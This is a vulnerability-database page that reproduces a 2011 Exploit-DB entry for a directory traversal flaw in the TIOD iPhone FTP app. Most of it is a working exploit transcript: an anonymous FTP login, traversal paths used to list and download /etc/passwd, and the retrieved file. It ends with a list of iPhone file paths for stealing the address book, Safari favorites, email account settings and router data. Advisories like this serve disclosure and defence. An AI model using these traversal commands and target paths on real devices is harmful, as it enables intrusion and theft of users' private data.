header-logo
Suggest Exploit
vendor:
TIOD v1.3.3 for iPhone / iPod touch
by:
R3d@l3rt, H@ckk3y
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: TIOD v1.3.3 for iPhone / iPod touch
Affected Version From: 1.3.2003
Affected Version To: 1.3.2003
Patch Exists: NO
Related CWE: N/A
CPE: a:tiod:tiod_v1.3.3_for_iphone_/ipod_touch
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: iPhone, iPod 3GS with 4.2.1 firmware
2011

TIOD v1.3.3 for iPhone / iPod touch, Directory Traversal

There is directory traversal vulnerability in the TIOD. Exploit Testing involves connecting to the server via FTP and using the 'dir' and 'get' commands to traverse the directory structure and retrieve the 'passwd' file.

Mitigation:

Ensure that user input is properly validated and sanitized to prevent directory traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: TIOD v1.3.3 for iPhone / iPod touch, Directory Traversal
# Date: 03/03/2011
# Author: R3d@l3rt, H@ckk3y
# E-Mail : R3dal3rt.team [at] gmail [dot] com
# Twitter : http://twitter.com/R3dAl3rtTeam
# Software Link: http://itunes.apple.com/kr/app/idocmanager/id404412400?mt=8
# Version: 1.3.3
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware  

# There is directory traversal vulnerability in the TIOD.  
# Exploit Testing


C:\>ftp
ftp> open 192.168.0.70
Connected to 192.168.0.70.
220 Service ready for new user.
User (192.168.0.70:(none)): anonymous
331 Send e-mail address as password.
Password:
230 User logged in, proceed.
ftp> dir
200 Command okay.
150 About to send file list.
total 0
drwxr-xr-x   2 501      501            68 Feb 14 12:39 CAMERAROLL
226 Transfer complete.
ftp: 76 bytes received in 0.01Seconds 5.07Kbytes/sec.
ftp> dir ../../../../../../etc/passwd
200 Command okay.
150 About to send file list.
total 0
-rw-r--r--   1 0        0             785 Jan 11 20:14 ../../../../../../etc/pas
swd
226 Transfer complete.
ftp: 94 bytes received in 0.00Seconds 94000.00Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 Command okay.
150 About to open data connection.


C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\>


# IPhone inside information

1. Phone Book
 - /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
     
2. Safari Favorites List
 - /private/var/mobile/Library/Safari

3. Users E-mail Information
 - /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist

4. IPv4 Router Information
 - /private/var/mobile/Library/Preferences/com.apple.conference.plist